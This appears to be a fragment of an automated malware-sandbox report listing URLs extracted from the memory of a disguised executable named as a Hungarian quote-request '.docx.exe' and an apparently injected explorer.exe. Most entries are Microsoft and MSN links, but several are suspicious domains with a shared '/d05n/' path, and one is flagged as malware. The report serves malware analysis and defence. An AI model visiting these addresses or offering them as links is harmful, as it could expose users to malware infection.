          http://www.ursing-caregiver-jobs-za-3.bond/d05n/ | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000006.00000000.1808128757.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4178769883.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://www.egakids.shopReferer: | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          https://wns.windows.com/L | explorer.exe, 00000006.00000002.4178769883.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://www.trl-migrate.online | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://word.office.com | explorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://www.ybzert.online | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | high
          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://www.apaescortatings.xyz/d05n/ | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.trl-migrate.onlineReferer: | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.xc31.top/d05n/www.ursing-caregiver-jobs-za-3.bond | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.joops.music | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://mbsngradnja.com/244_Rgzwnbqrkpnv | #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.0000000000597000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.trl-migrate.online/d05n/www.r-outsourcing-69869.bond | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.ynapticshiftai.tech/d05n/ | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://www.ursing-caregiver-jobs-za-3.bond/d05n/www.trl-migrate.online | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://mbsngradnja.com:80/244_Rgzwnbqrkpn | #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.00000000005C2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://www.9838.xyz | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          https://www.rd.com/list/polite-habits-campers-dislike/ | explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
          http://www.egakids.shop/d05n/www.ental-implants-50062.bond | explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://android.notify.windows.com/iOS | explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | |
                                                                                  high
                                                                                  http://www.egakids.shopexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.eanliving.site/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000006.00000000.1790982592.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.9838.xyz/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://outlook.com_explorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.pmail.com#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002805000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1831855062.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002806000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.ursing-caregiver-jobs-za-3.bondexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://ocsp.sectigo.com0C#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.ynapticshiftai.techReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://mbsngradnja.com/244_Rgzwnbqrkpnb:$#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.00000000005B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://mbsngradnja.com/244_Rgzwnbqrkpn4W#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1781016526.000000000057F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://ocsp.sectigo.com0#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.atingdilse.siteReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.ynthia-mcc-lin-tick.linkReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.ybzert.onlineReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.ynthia-mcc-lin-tick.link/d05n/www.atingdilse.siteexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000006.00000002.4172505215.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://powerpoint.office.comcemberexplorer.exe, 00000006.00000002.4178769883.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1808128757.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.egos.design/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.egakids.shop/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000006.00000000.1790982592.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4172505215.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.atingdilse.site/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0##U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.microexplorer.exe, 00000006.00000000.1792661792.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1803231829.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1794996906.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.joops.music/d05n/www.upta.bioexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.9838.xyz/d05n/www.ybzert.onlineexplorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.eanliving.siteReferer:explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://www.ynthia-mcc-lin-tick.link/d05n/explorer.exe, 00000006.00000003.3491658173.000000000CAD5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4181529621.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3105870721.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106379790.000000000CA83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106750867.000000000CAD2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3492345348.000000000CAD5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
